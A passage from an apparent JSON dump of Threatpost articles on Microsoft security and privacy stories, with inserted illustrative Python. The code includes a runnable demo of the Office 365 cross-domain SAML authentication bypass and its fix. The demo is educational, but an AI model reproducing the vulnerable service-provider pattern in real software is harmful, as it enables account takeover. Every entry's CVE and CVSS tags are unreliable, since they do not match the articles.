But these methods also can be used for blocking other kinds of downloadable content. 
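The decision a filter list drives, as an added example that is not part of the proposal text or of IE9: the user agent classifies each automatic sub-request as first- or third-party relative to the page the user deliberately visited, and consults the list only for third-party requests. The rule syntax used here ("-d host" blocks a domain and its subdomains, "+d host" allows one, allow wins) is an assumption modelled loosely on the list format rather than taken from the page, the registrable-domain logic is a deliberate simplification that ignores the public-suffix list, and the sample list and URLs are constructed for the demo.

```python
"""Illustrative tracking-protection filter-list evaluation (added example).

Not Microsoft's implementation. Rule format and eTLD+1 logic are
simplifying assumptions, as described in the lead-in.
"""
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: the last two DNS labels. Assumption: no multi-label
    public suffixes such as co.uk (a real browser consults the PSL)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_third_party(page_url: str, resource_url: str) -> bool:
    """A resource is third-party when its site differs from the page's site."""
    page_host = urlsplit(page_url).hostname or ""
    res_host = urlsplit(resource_url).hostname or ""
    return registrable_domain(page_host) != registrable_domain(res_host)


def parse_filter_list(text: str):
    """Return (blocked_hosts, allowed_hosts) from '-d host' / '+d host' lines.
    Lines beginning with '#' are comments; anything else is ignored."""
    blocked, allowed = set(), set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        op, _, host = line.partition(" ")
        host = host.strip().lower()
        if not host:
            continue
        if op == "-d":
            blocked.add(host)
        elif op == "+d":
            allowed.add(host)
    return blocked, allowed


def host_matches(host: str, rule_host: str) -> bool:
    """'-d tracker.example' covers tracker.example and every subdomain of it."""
    return host == rule_host or host.endswith("." + rule_host)


def should_block(page_url: str, resource_url: str, filter_list) -> bool:
    """Apply the list to one automatic sub-request.
    First-party requests are never filtered; an explicit allow rule
    overrides any block rule; unlisted third parties are left alone."""
    if not is_third_party(page_url, resource_url):
        return False
    host = (urlsplit(resource_url).hostname or "").lower()
    blocked, allowed = filter_list
    if any(host_matches(host, a) for a in allowed):
        return False
    return any(host_matches(host, b) for b in blocked)


# Constructed sample list: block a tracking network, allow its static CDN.
SAMPLE_LIST = """\
# hypothetical filter list for the demo
-d tracker.example
+d static.tracker.example
-d adnet.example
"""


def demo() -> dict:
    """Evaluate a handful of constructed sub-requests from one page load."""
    fl = parse_filter_list(SAMPLE_LIST)
    page = "https://news.example/story"
    return {
        "beacon": should_block(page, "https://px.tracker.example/1x1.gif", fl),
        "cdn": should_block(page, "https://static.tracker.example/lib.js", fl),
        "first_party": should_block(page, "https://img.news.example/a.png", fl),
        "unlisted": should_block(page, "https://cdn.other.example/x.js", fl),
        "ad": should_block(page, "https://adnet.example/ad", fl),
    }


if __name__ == "__main__":
    print(demo())
```

The allow-overrides-block ordering matters: without it, the `-d tracker.example` rule would also swallow `static.tracker.example`, which is the kind of breakage that leads users to switch protection off entirely.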
\n\nIn Microsoft\u2019s proposal, the Tracking Protection system also implements a method for respecting the Do Not Track HTTP header.\n\n\u201cBy having both a header and a DOM property, websites can easily detect the user preference from both client and server code. When the [Do Not Track user preference](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-do-not-track-pref>) is set, the user-agent _must_ apply the HTTP header to all HTTP requests, and the DOM property _must_ be applied to all documents. The user agent is responsible for determining the user experience by which the [Do Not Track user preference](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-do-not-track-pref>) is enabled,\u201d the proposal says.\n\nMicrosoft submitted its proposal to the W3C, an independent standards body, on Thursday. The group published the proposal, but that does not mean that it\u2019s been accepted as a standard or is anywhere close to acceptance. 
It\u2019s simply the first step in the process.\n", "cvss3": {}, "published": "2011-02-25T19:34:54", "type": "threatpost", "title": "Microsoft Submits Tracking Protection Proposal to W3C", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:07", "id": "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "href": "https://threatpost.com/microsoft-submits-tracking-protection-proposal-w3c-022511/74968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message regardless of the actual error encountered. This denies the attacker the error responses that would reveal which error the application raised, which is the distinguishing signal a padding oracle attack depends on.\n\n\u201cA workaround you can use to prevent this vulnerability is to enable the <customErrors> feature of ASP.NET, and explicitly configure your applications to always return the same error page \u2013 regardless of the error encountered on the server. 
By mapping all error pages to a single error page, you prevent a hacker from distinguishing between the different types of errors that occur on a server,\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the workaround. \u201c**Important**: It is not enough to simply turn on CustomErrors or have it set to RemoteOnly. You also need to make sure that all errors are configured to return the same error page. This requires you to explicitly set the \u201cdefaultRedirect\u201d attribute on the <customErrors> section and ensure that no per-status codes are set.\u201d\n\nHowever, the researchers who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. A uniform error page removes one distinguisher but not necessarily every one, so the workaround reduces exposure rather than closing the flaw.\n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release.\n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "description": "A severe vulnerability in the way Microsoft Office 365 handles federated identities via SAML put an attacker in a position to access any account and its data, including email messages and files stored in the cloud-based service.\n\nMicrosoft pushed through a mitigation to the service on Jan. 
5, seven hours after being notified by researchers Yiannis Kakavas and Klemen Bratec.\n\n\u201cThe attack surface was quite big (Outlook Online, OneDrive, Skype for Business, OneNote \u2013 depending on what the company has paid for in terms of licensing),\u201d Kakavas and Bratec told Threatpost via email. \u201cAnd a malicious user exploiting this vulnerability could have gained access to very sensitive private and company information (emails, internal documents, etc.).\u201d\n\nOffice 365 customers with federated domains, and thus in the line of fire, were numerous, worldwide and high profile, among them British Airways, Microsoft, Vodafone and Verizon, as listed in a [report](<http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass>) [published](<https://bratec.si/security/2016/04/27/road-to-hell-paved-with-saml-assertions.html>) this week.\n\nKakavas, of the Greek Research and Technology Network, and Bratec, of Sola prihodnosti Maribor, identified the vulnerability in the SAML Service Provider implementation in Office 365. The flaw allowed for a \u201ccross-domain authentication bypass affecting all federated domains,\u201d the researchers wrote. SAML is the Security Assertion Markup Language, a standard used by organizations to exchange authentication and authorization data; it is used primarily to enable single sign-on between web domains.\n\nThe problem with Microsoft\u2019s implementation of SAML 2.0 in Office 365 is that the service fails to validate the subject of the assertion being passed, specifically the NameID element. 
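The failure pattern described in this article, as an added example that is not part of the article and is neither Microsoft's code nor the researchers' tooling: a Service Provider that resolves the signing key from the assertion's Issuer, verifies the signature correctly, and then logs in whoever the asserted identity attribute (the IDPEmail attribute the article goes on to quote) names, without checking that the identity belongs to a domain that Issuer is federated for. Real SAML carries an XML-signed Assertion; here an assertion is a small dict and HMAC-SHA256 stands in for the signature so the example runs offline. The issuer names, keys, domains and addresses are all constructed for the demo.

```python
"""Illustrative cross-domain SAML assertion check (added example).

Not Office 365 code. HMAC over a canonical JSON body stands in for the
XML signature; FEDERATION stands in for the per-IdP certificate and
federated-domain configuration an SP holds after federation setup.
"""
import hashlib
import hmac
import json

# Per-IdP trust configuration (constructed). "key" stands in for the IdP's
# signing certificate; "domains" are the DNS domains the IdP is federated
# for and therefore the only identities it is authoritative about.
FEDERATION = {
    "https://idp.victim.example/saml": {
        "key": b"victim-idp-signing-key",
        "domains": {"victim.example"},
    },
    "https://idp.attacker.example/saml": {          # attacker's own tenant IdP
        "key": b"attacker-idp-signing-key",
        "domains": {"attacker.example"},
    },
}


def canonical(assertion: dict) -> bytes:
    """Deterministic serialisation the signature covers (stand-in for XML c14n)."""
    return json.dumps(assertion, sort_keys=True, separators=(",", ":")).encode()


def idp_sign(issuer: str, attributes: dict) -> dict:
    """What an IdP emits: an assertion naming itself as Issuer, plus a signature."""
    assertion = {"Issuer": issuer, "Attributes": attributes}
    sig = hmac.new(FEDERATION[issuer]["key"], canonical(assertion), hashlib.sha256).hexdigest()
    return {"Assertion": assertion, "Signature": sig}


def signature_valid(response: dict) -> bool:
    """Find the key by Issuer and verify the signature. This part is correct in
    both SP variants below; the bug is in what happens after it succeeds."""
    cfg = FEDERATION.get(response["Assertion"]["Issuer"])
    if cfg is None:
        return False
    expected = hmac.new(cfg["key"], canonical(response["Assertion"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, response["Signature"])


def sp_consume_vulnerable(response: dict):
    """Vulnerable SP: a valid signature logs in whoever IDPEmail names."""
    if not signature_valid(response):
        return None
    return response["Assertion"]["Attributes"]["IDPEmail"]


def sp_consume_hardened(response: dict):
    """Hardened SP: the asserted identity must belong to a domain this Issuer is
    federated for, so IdP X can never vouch for users of IdP Y."""
    if not signature_valid(response):
        return None
    issuer = response["Assertion"]["Issuer"]
    email = response["Assertion"]["Attributes"]["IDPEmail"]
    local, sep, domain = email.rpartition("@")
    if not sep or not local or not domain:
        return None
    if domain.lower() not in FEDERATION[issuer]["domains"]:
        return None
    return email


def demo() -> dict:
    """Attacker's IdP asserts a victim.example user; victim's IdP asserts its own user."""
    forged = idp_sign("https://idp.attacker.example/saml", {"IDPEmail": "ceo@victim.example"})
    honest = idp_sign("https://idp.victim.example/saml", {"IDPEmail": "ceo@victim.example"})
    return {
        "vulnerable_accepts_forged": sp_consume_vulnerable(forged),
        "hardened_accepts_forged": sp_consume_hardened(forged),
        "hardened_accepts_honest": sp_consume_hardened(honest),
    }


if __name__ == "__main__":
    print(demo())
```

The attacker does not need to forge anything cryptographic: the signature is genuine, made by a key the SP trusts, which is why fixing the signature check alone would not have helped and the binding between Issuer and asserted domain is the control that matters.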
The service must then rely on other values, such as the IDPEmail attribute, to identify the user.\n\n\u201cAs it turns out, the Service Provider used the Issuer of the Assertion only to find the matching certificate in order to verify the SAML Response/Assertion signature, but didn\u2019t perform any sanity checks on the supplied value of the IDPEmail attribute,\u201d the researchers wrote. \u201cThat basically means that it would happily consume assertions, asserting that Identity Provider X has authenticated users of Identity Provider Y.\u201d\n\nThe researchers describe the technical details in their report. They told Threatpost that the flaw was relatively easy to exploit, but added there is no indication the flaw had ever been publicly exploited, nor how long it was present in Office 365 before it was found.\n\n\u201cAll an attacker needed was a trial subscription to Office 365 and a SAML 2.0 Identity Provider installation. There is some bare minimum of SAML knowledge one must have, but the process of setting up SAML SSO with Office 365 is well documented and easy to follow,\u201d the researchers said. \u201cA more advanced attacker with slightly better SAML knowledge would be able to script a tool and perform the attack in an automated manner without the need of a SAML 2.0 Identity Provider.\u201d\n\nThe researchers said the flaw is not limited to SAML-based single sign-on implementations; they were able to carry out the same attack over Active Directory Federation Services (ADFS).\n\n\u201cThe SAML Service Provider consumed the SAML assertion from the attacker\u2019s org Identity Provider even though the spmb.si domain is configured to be federated with WS-Trust, forwarded it to the token translation service which translated it to a WS-Trust token and \u2026 we were in,\u201d they wrote.\n\nThey told Threatpost: \u201cWe were surprised that the organizations that have their domains federated using WS-Trust and ADFS were also vulnerable to this. 
We know that pretty much only academic institutions use SAML 2.0 SSO, so in the beginning the number of vulnerable organizations seemed to be relatively small.\u201d\n\nThe two said they were awarded close to the maximum bounty from Microsoft for their research; the bounty pays between $500 and $15,000 USD.\n", "cvss3": {}, "published": "2016-04-28T10:44:58", "type": "threatpost", "title": "Office 365 Vulnerability Exposed Any Federated Account", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-29T16:54:19", "id": "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "href": "https://threatpost.com/office-365-vulnerability-exposed-any-federated-account/117716/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:54", "description": "The Electronic Frontier Foundation is blasting Microsoft for its \u201cmalicious\u201d and \u201cannoying\u201d tactics when it comes to prodding Windows users to update their operating system to Windows 10.\n\nThe digital watchdog group says Microsoft\u2019s strategy of pushing the Windows 10 upgrade application onto users\u2019 systems was unwelcome to many, and that the company crossed the line when users began uninstalling the app and Microsoft reacted by changing the app multiple times and bundling it into various security patches, creating a \u201ccat-and-mouse game to uninstall it,\u201d [wrote Amul Kalia, legal intake coordinator at the EFF](<https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive>).\n\n\u201cThe tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious,\u201d he said. 
\u201cThe app couldn\u2019t be easily hidden or removed.\u201d\n\nKalia blames Microsoft\u2019s ambitious stated goal to install Windows 10 on one billion devices by the end of 2018 for its drive to \u201caggressively\u201d push the OS update on users. Officially Microsoft called the update campaign Get Windows 10 (GWX) and offered Windows 7 and 8.1 users the ability to upgrade to Windows 10 for free before July 29, 2016. According to Microsoft, 300 million devices were running Windows 10 in May, but it\u2019s unclear how many upgraded using the GWX app.\n\nWith GWX Microsoft sparked a vocal user backlash from some Windows users who insisted they were forced to upgrade to Windows 10. The hostile response also included four lawsuits against Microsoft for its \u201cquestionable\u201d upgrade tactics. New York Attorney General Eric Schneiderman announced he would be pursuing a GWX investigation as well.\n\nWhen asked to comment on the EFF\u2019s critique of its GWX efforts Microsoft supplied Threatpost with the boilerplate statement: \u201cMicrosoft is committed to customer privacy and ensuring that customers have the information and tools they need to make informed decisions. We listened to feedback from our customers and evolved our approach to the upgrade process. Windows 10 continues to have the highest satisfaction of any version of Windows.\u201d\n\nOriginally, Microsoft pushed the Windows 10 upgrade app via its Windows Update system. Users who received the app had a Windows 10 upgrade icon placed in their system tray that doubled as a way to initiate the OS upgrade download as well as offering an advertisement that boasted new Windows 10 features.\n\nOver time Microsoft became more aggressive, according to the EFF, bundling Windows 10 ads as part of an Internet Explorer security patch. 
Also criticized was the fact that in many instances Microsoft didn\u2019t just download the Windows 10 upgrade app, but also downloaded the entire set of Windows 10 installation files (4GB).\n\nBut the EFF maintains that in May 2016 Microsoft crossed a line when it changed the expected behavior of a dialog prompt used in a window tied to the Windows 10 upgrade app. \u201cSpecifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the \u2018X\u2019 in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10,\u201d Kalia wrote.\n\nThe EFF also asserts that with the introduction of the Cortana digital assistant, a feature introduced with Windows 10, Microsoft demonstrated another disturbing behavior pattern and disregarded user privacy under the guise of Cortana customization.\n\n\u201cWindows 10 sends an unprecedented amount of usage data back to Microsoft,\u201d Kalia maintains, including location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.\n\nUsers can, of course, disable data-sharing features to limit the amount of personal information Microsoft collects. 
However, the EFF says even those who opt out of sharing data within Windows 10 still can\u2019t escape sharing some data with Microsoft via the operating system\u2019s telemetry reporting.\n\nWindows 10 telemetry, also known as the Universal Telemetry Client (UTC), is \u201csystem data that is uploaded by the Connected User Experience and Telemetry component.\u201d Information shared with Microsoft via UTC includes system uptime and crash data and hardware attributes such as CPU, installed memory, and storage, according to [Windows expert Ed Bott](<http://www.zdnet.com/article/windows-10-telemetry-secrets/>), who has written extensively about Windows 10 telemetry.\n\nUTC can collect personal data as part of a crash report when specific files are the cause of the system failure. Users of Windows 10 Enterprise Edition can turn telemetry data sharing off, but Home and Pro users can\u2019t, the EFF maintains.\n\n\u201cThere\u2019s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. 
But it\u2019s a shame that Microsoft made users choose between having privacy and security,\u201d Kalia said.\n", "cvss3": {}, "published": "2016-08-18T16:38:30", "type": "threatpost", "title": "EFF Blasts Microsoft Over Windows 10 Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-19T17:00:44", "id": "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "href": "https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:24", "description": "[](<https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/>)\n\nWhen Mark Dowd and Alex Sotirov demonstrated a technique for [bypassing Vista\u2019s memory protections](<http://taossa.com/archive/bh08sotirovdowd.pdf>) at Black Hat last year, the security community was stunned. Microsoft officials said at the time they were working on ways to defeat the pair\u2019s attack and now that protection has arrived, in the form of Internet Explorer 8.\n\nDowd (above, right), who works for IBM ISS in Australia, says in a blog post that the improvements that Microsoft has made in the [security of IE 8](<http://blogs.iss.net/archive/chicksdigIE8.html>) have the effect of preventing the memory-bypass attacks from working.\n\n\u201cBasically, the fix is simple: Loading .NET controls has been associated with a special privilege that users can enable or disable \u2013 and in the default configuration for the \u201cInternet Zone\u201d (the Medium-High setting), .NET controls have been disabled,\u201d Dowd writes.\n\nThe attack that Dowd and Sotirov (above, left) showed off at Black Hat was complex, but the basic premise is that they were able to load a .Net control onto a Web page into a location of their choosing, and with whatever permissions they chose. 
This allowed them to get around two of the main memory protections in Windows Vista, ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). These two technologies are a major part of the security upgrades that Microsoft added to Vista, and Dowd and Sotirov\u2019s attack was seen as a breakthrough.\n\nBut now, with the addition of the new permission to IE 8, Microsoft has put a stop to that particular attack. As [Jonathan Ness](<http://blogs.technet.com/srd/archive/2009/03/23/released-build-of-internet-explorer-8-blocks-dowd-sotirov-aslr-dep-net-bypass.aspx>) of the Microsoft Security Response Center writes in his blog on IE 8 security, \u201cThe final release of Internet Explorer 8 on Windows Vista blocks the .NET DEP+ASLR bypass mechanism from malicious websites on the Internet. Specifically, IE8 created a new URLAction that regulates loading of the .NET MIME filter. By default, the URLAction prevents it from loading in the Internet and Restricted Sites Zones. The .NET MIME filter is allowed to load by default in the Intranet Zone.\u201d \n\n\n\nThis is a nice advance for Microsoft and for its customers. IE for years has been seen as by far the least secure of the major browsers, but that perception may be shifting now. At last week\u2019s CanSecWest conference, the hackers in the Pwn2Own contest went right after Safari, believing that IE 8 on Vista was too tough to crack. It eventually went down, surprising many of the researchers in attendance.\n\nThis is all to the good, as Dowd writes.\n\n\u201cSo, the net effect (no pun intended) of this change is that by default, our technique will no longer work in its current form against IE8 browsers in their default configuration. There are also a number of other security enhancements in IE8,\u201d he writes. \u201cMost notably, the browser now runs in \u2018Protected Mode.\u2019 Essentially, this means that the browsing process runs in a sandbox of sorts with a restricted set of privileges. 
(Internally, this is implemented by utilizing Vista\u2019s \u2018Low Integrity\u2019 mode and communicating to a broker process via an out of process COM server. But, that is the topic of another post.) Furthermore, DEP has been enabled in IE8, which is a big change from IE7. This means that IE8 now fully reaps the benefits of the Vista memory protections. Hacking it is going to be hard! .. Probably!\u201d\n", "cvss3": {}, "published": "2009-03-26T18:27:42", "type": "threatpost", "title": "IE8 security stops memory bypass attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "href": "https://threatpost.com/ie8-security-stops-memory-bypass-attacks-032609/72537/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. Sabelnikov was the operator of the botnet, but that he was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos botnet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. 
District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. 
Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Scheduled patch deliveries are so last decade\u2014and thankfully, it looks like they\u2019re over when it comes to [Microsoft Patch Tuesday](<https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941>).\n\nMicrosoft this week at its Ignite event introduced its new security update scheme called [Windows Update for Business](<http://blogs.windows.com/bloggingwindows/2015/05/04/announcing-windows-update-for-business/>), which debuts in Windows 10 with several 
new features that help IT departments take better control of patch deployments and prioritization. For consumers and businesses not running Windows Pro or Windows Enterprise devices where the service is free, the second-Tuesday-of-every-month procession of updates is over.\n\n\u201cWe\u2019re not going to be delivering all of these updates to all of these consumers on one day of the month,\u201d said Terry Myerson, executive vice president of operating systems at Microsoft.\n\nAnd with that declaration, Patch Tuesday\u2019s 12-year run is essentially done. Companies that have structured all-hands-on-deck patch rollouts will now get patches\u2014and new functionality features\u2014as they\u2019re available. Windows of exposure to attacks against unpatched vulnerabilities close a little tighter. The applause given to Myerson during his keynote at Ignite was likely echoed in server rooms worldwide.\n\nFor Windows Update for Business users, patch rollouts will look different. Distribution rings allow Windows admins to designate which machines get updates on a quicker cycle\u2014think remote offices and workers. Admins can also designate maintenance windows for certain machines, and integrate the update mechanism into existing system management tools.\n\n\u201cConsumers will want to be on one of the faster-moving tiers. They may not want to be part of the \u2018ludicrous\u2019 tier, but these users will want faster adoption of new features and user experience changes,\u201d said Chris Goettl of Shavlik, a longtime patch management firm. \u201cWith this change, businesses will actually be able to take advantage of all tiers. An IT organization with a desire to vet out new updates before they reach the bulk of their user base can put a test group on the \u2018ludicrous\u2019 tier. 
That way they can get a feel for the changes coming, the stability of those changes and potentially block any of those updates that have a negative effect.\u201d\n\nMicrosoft said it will offer what it\u2019s calling Long Term Servicing Branches, which offer only security updates to machines on that tier, similar to Patch Tuesday updates as currently structured.\n\n\u201cWith these changes, the power of Patch Tuesday will diminish rapidly,\u201d Goettl said.\n\nIt\u2019s no secret Microsoft has had an interesting few months with regard to patching. First there was an internal restructuring under new CEO Satya Nadella that resulted in 2,100 layoffs and the integration of the [Trustworthy Computing group](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) into Microsoft\u2019s enterprise and cloud computing organizations. In the subsequent months since the September 2014 shakeup, [patch quality](<https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>) has been an issue with a couple of important fixes pulled back, and other publicly disclosed and exploited vulnerabilities sitting unpatched for a nerve-racking period of time. And not to mention, Microsoft\u2019s decision to discontinue [Advanced Notification of patches](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>) on the Thursday prior to Patch Tuesday, leaving it available only to premier support customers.\n\nNow that the dust has settled in Redmond, it\u2019s clear that the plan was to give Patch Tuesday a facelift. For consumers who are indifferent about security updates, this assures a fleet of devices running at current patch levels on a timely basis. For businesses, more choice and control is always welcome.\n\n\u201cSome people want the software right after it finishes our testing,\u201d Microsoft\u2019s Myerson said. \u201cThey don\u2019t want to wait a second. 
Then we have people step back and say they\u2019ll wait until we work out the kinks and make sure there are no compatibility issues, no functionality issues. Great, we let the user choose. With this, we have confidence that we have the highest quality patches, testing them with an incredibly broad population.\u201d\n\nSlow-moving enterprises, meanwhile, are likely to stick to their current change and configuration management processes for the time being. Some companies just cannot afford the downtime and reliability issues caused by a patch breaking other applications, or updates requiring a reboot to take effect during business hours.\n\n\u201cImagine the referential integrity issues with some machines accepting patches and others not based on reboots, when services can be restarted, or even if they are offline,\u201d said Morey Haber, vice president of technology at Beyond Trust. \u201cBusinesses would no longer have a controlled baseline to measure against when patches are being streamed versus a firm bulk release by date.\u201d\n\nHowever, with the speed at which vulnerabilities are being found by white and black hats\u2014and disclosed\u2014organizations can no longer afford to sit tight for three to four weeks, or months, waiting for a patch. The speed at which attacks are folded into exploit kits should give pause to any critic of automatic rollouts.\n\n\u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time?\u201d Andrew Storms, VP of security services at New Context, told Threatpost in February. \u201cIf I were a CIO, I would be drooling.\u201d\n\nMicrosoft would not answer questions for this article, and instead provided this statement: \u201cWindows Update for Business can take responsibility for the timely distribution of security updates for customers for free. 
Customers that choose to distribute updates themselves will continue to receive the updates on the second Tuesday of the month.\u201d\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2015-05-06T13:10:24", "type": "threatpost", "title": "Windows Update for Business Uproots Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T19:58:48", "id": "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "href": "https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:10", "description": "Late last week it emerged that Microsoft had searched through the contents of a French blogger\u2019s Hotmail account in order to track down the source of a leak of proprietary information from the Redmond, Wash., tech giant.\n\nThe Electronic Frontier Foundation and transparency advocates have expressed stark disapproval of the entire situation. The EFF is even suggesting that Microsoft\u2019s actions here constitute [a direct violation of the Electronic Communications Privacy Act](<https://www.eff.org/deeplinks/2014/03/microsoft-says-come-back-warrant-unless-youre-microsoft>) (ECPA).\n\nThe saga began when a Microsoft employee named Alex Kibkalo allegedly stole protected information pertaining to Microsoft\u2019s Activation Server Software Developer\u2019s Kit (SDK) and emailed it \u2013 via Hotmail, which is owned and operated by Microsoft \u2013 to a French blogger.\n\nAround August 2012, Microsoft became aware that someone had leaked the SDK after the blogger in question \u2013 who is not named in the criminal complaint filed against Kibkalo in September 2012 \u2013 began posting 